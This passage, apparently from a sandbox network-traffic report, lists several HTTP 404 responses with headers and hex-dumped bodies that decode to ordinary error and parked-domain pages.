36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 10 Oct 2024 12:12:57 GMTConnection: closeContent-Length: 5097Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:13:38 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:13:41 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:13:43 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:13:46 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.15.8.1Date: Thu, 10 Oct 2024 12:13:52 GMTContent-Type: text/htmlContent-Length: 2842Connection: closeETag: "663736a8-b1a"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 e9 94 99 e8 af af 20 2d 20 70 68 70 73 74 75 64 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 70 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 57 65 64 2c 20 32 36 20 46 65 62 20 31 39 39 37 20 30 38 3a 32 31 3a 35 37 20 47 4d 54 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 30 22 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 62 6f 64 79 7b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 61 72 69 61 6c 2c 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 27 2c 27 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 